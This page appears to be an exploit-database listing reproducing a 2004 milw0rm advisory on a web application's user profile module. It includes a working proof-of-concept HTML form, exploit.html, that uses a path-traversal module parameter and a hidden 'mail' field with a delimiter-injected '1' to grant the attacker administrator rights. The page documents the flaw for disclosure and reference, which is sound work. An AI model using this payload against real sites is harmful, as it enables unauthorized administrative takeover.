header-logo
Suggest Exploit
vendor:
by:
Unknown
5.5
CVSS
MEDIUM
Privilege Escalation
269
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

User Account Privilege Escalation

An attacker can exploit a vulnerability in the user registration and login functionality of a website to escalate their privileges to administrator level. By submitting a specially crafted form, the attacker can inject the value '1' into the database file, granting them administrator privileges.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and access controls on the user registration and login functionality.
Source

Exploit-DB raw data:

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any mail com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

# milw0rm.com [2004-09-30]

Navigation

Suggest Exploit

Services By CQR